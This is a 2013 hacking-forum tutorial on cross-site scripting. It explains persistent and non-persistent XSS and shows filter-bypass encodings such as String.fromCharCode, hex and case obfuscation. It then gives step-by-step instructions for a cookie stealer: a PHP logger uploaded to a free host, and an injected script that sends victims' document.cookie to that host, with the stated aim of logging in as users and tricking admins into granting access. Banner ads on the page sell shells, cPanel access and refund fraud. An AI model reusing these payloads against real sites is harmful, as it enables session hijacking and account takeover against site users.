Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
New Ownership - Policies and Changes Going Forward
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial Basic XSS, cookie logger and XSS shell filter_list
Author
Message
Merkuri Offline
Senior Member
Twelve Years of Service
Posts: 334
Threads: 69
Reputation: 0
Currency: 0 NSP
Basic XSS, cookie logger and XSS shell 01-21-2013, 06:21 PM #1
[Image: RIFMn.jpg]

XSS tutorial
Methodology
Spoiler:
XSS stand from cross-site scripting basicly this is injecting script(usually Javascript) in the site. There are two types of XSS

Persistent XSS
This si when the script is stored on the page after reload for example commend form. This attack can be used for injecting shell in the site.
Non-persistent XSS
This is when the scipt isn't stored on the page for example search box. This attack can be used for setuping cookie logger, phishing or setuping JDB.
Before you start exploting XSS vulnerabilities you should know little JavaScript. You can read my tutorials for basic JavaScript since there isn't interes on them I haven't continue to writing them.

Now you should test every place where you can write text in the site search box, comment box, chat box every thing. you can use this cheat sheet because it's more easy
Code:
http://www.xenuser.org/xss-cheat-sheet/
Also not it's the moment to tolk about bypassing filters
Spoiler:
Using String.fromCharCode()
This is easy technique very popular those days. Basic String.fromCharCode() is a javascript function that converts ASCII value to Characters.
<script>alert('XSS');</script> will look :
Code:
<script>String.fromCharCode(97,108,101,114,116,40,8216,88,83,83,41,59)</script>
You can use online tools to do this
Code:
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
or HackBar which is Firefox add-on.
HEX encoding is similar technique, you encrypt text to HEX =D.
Here is example of <script>alert('XSS');</script>
Code:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%27%58%53%53%5c%27%29%3b%3c%2f%73%63%72%69%70%74%3e%20
Also you can use it to scam a victims becase if they see <script>....... in url will look suspiciously.
Obfuscation is another popular technique.
Here how <script>alert('XSS');</script> will look
Code:
<sCrIpT>aLeRt('XSS');</sCrIpT>
Sometimes closeing tag will bypass filters basicly this is adding close tag before the script
Code:
"><script>alert('XSS');</script>
Sometimes < > may be filtered but you can use this script
Code:
";alert(0);"
Cookie stealer
Spoiler:
Setuping cookie stealer is one of the best things you can do with non-persistent XSS, basicly this is a script that steal the cookies of the user and you can use it to login as this user, you can use this for SE-ing the admin and get admin access.

First you need to make a little PHP script
link :
Code:
http://pastebin.com/6pThnUU7
I have explain the code it's easy understandable.
Now you have to upload it somewhere for example http://www.cwahi.net/
Now when you do this you should inject this script on the vulnerable page
Code:
<script>document.location="www.site.com/cookie-logger.php?c=" + document.cookie</script>
You can enforce all filter bypassing techniques.
XSS Shell demo (SecurityTube)
Spoiler:
I don't have any idea if phishing is illicit here so I won't write for it now if there is interes on it I will make short tutorial.

Reply





Messages In This Thread
Basic XSS, cookie logger and XSS shell - by Synchro - 01-21-2013, 06:21 PM



Users browsing this thread: 1 Guest(s)